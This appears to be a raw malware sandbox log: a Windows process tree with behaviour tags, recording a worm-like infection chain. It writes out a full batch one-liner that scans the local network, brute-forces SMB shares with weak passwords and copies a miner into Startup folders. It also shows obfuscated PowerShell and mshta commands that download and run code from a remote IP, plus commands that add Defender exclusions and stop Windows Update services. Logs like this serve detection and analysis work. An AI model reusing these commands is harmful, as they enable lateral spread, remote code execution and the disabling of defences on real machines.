C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0307& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))5⤵
- Indicator Removal: Network Share Connection Removal
PID:17752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"6⤵
- Network Service Discovery
PID:13940 -
C:\Windows\SysWOW64\net.exenet view7⤵
- Discovers systems in the same network
PID:17592
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"7⤵PID:14784
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a7⤵
- Network Service Discovery
PID:8700
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"7⤵PID:8848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_6⤵PID:11164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "6⤵PID:3568
-
C:\Windows\SysWOW64\net.exenet view \\10.127.0.17⤵
- Discovers systems in the same network
PID:2384
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵PID:11252
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:11952
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7604
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:7716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:15808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:18428
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:10204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:10684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:10660
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:11572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:14800
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:6200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9428
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:8720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:8584
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:7884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:14484
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:8028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:14572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:14552
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:11032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:8764
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:14684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:18396
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:14012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:8116
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵PID:14732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\IMG001.exe" "6⤵PID:13792
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe"7⤵PID:15640
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:12500
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵PID:13660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:18044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:16772
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:14460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:16328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:14172
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:7184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9408
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:7340
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:17972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:8500
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:14200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:12088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:14720
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:17920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:11544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:452
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:14068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:16004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:16028
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:6864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:15684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:5712
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:15192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:13028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:16700
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:7272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:12460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:8364
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:7520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:7716
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵PID:12716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:10092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\IMG001.exe" "6⤵PID:5652
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe"7⤵PID:10572
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:12372
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- Runs ping.exe
PID:8776
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:10024
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"6⤵PID:18136
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"6⤵PID:5952
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:12804
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"1"6⤵PID:5332
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"1"6⤵PID:8376
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:14576
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"6⤵PID:5400
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"6⤵PID:14304
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:17780
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0307" /user:"1"6⤵PID:14476
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0307" /user:"1"6⤵PID:15528
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10516
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"1"6⤵PID:7548
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"1"6⤵PID:4608
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:13524
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"10.127.0.1"6⤵PID:9640
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\rh.exe"C:\Users\Admin\AppData\Local\Temp\a\rh.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1496 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 5804⤵
- Program crash
PID:4732
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\file.exe"C:\Users\Admin\AppData\Local\Temp\a\file.exe"3⤵
- Executes dropped EXE
PID:1864 -
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js4⤵PID:3660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:3604 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"6⤵PID:1860
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update7⤵PID:4268
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2312
-
-
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update8⤵
- Blocklisted process makes network request
PID:1128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X9⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:3840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\10⤵
- Command and Scripting Interpreter: PowerShell
PID:3220
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"10⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:4948 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force11⤵
- Command and Scripting Interpreter: PowerShell
PID:1720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart11⤵PID:5072
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart12⤵PID:3132
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc11⤵
- Launches sc.exe
PID:4632
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc11⤵
- Launches sc.exe
PID:3408
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv11⤵
- Launches sc.exe
PID:3064
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits11⤵
- Launches sc.exe
PID:4836
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc11⤵
- Launches sc.exe
PID:760
-
-
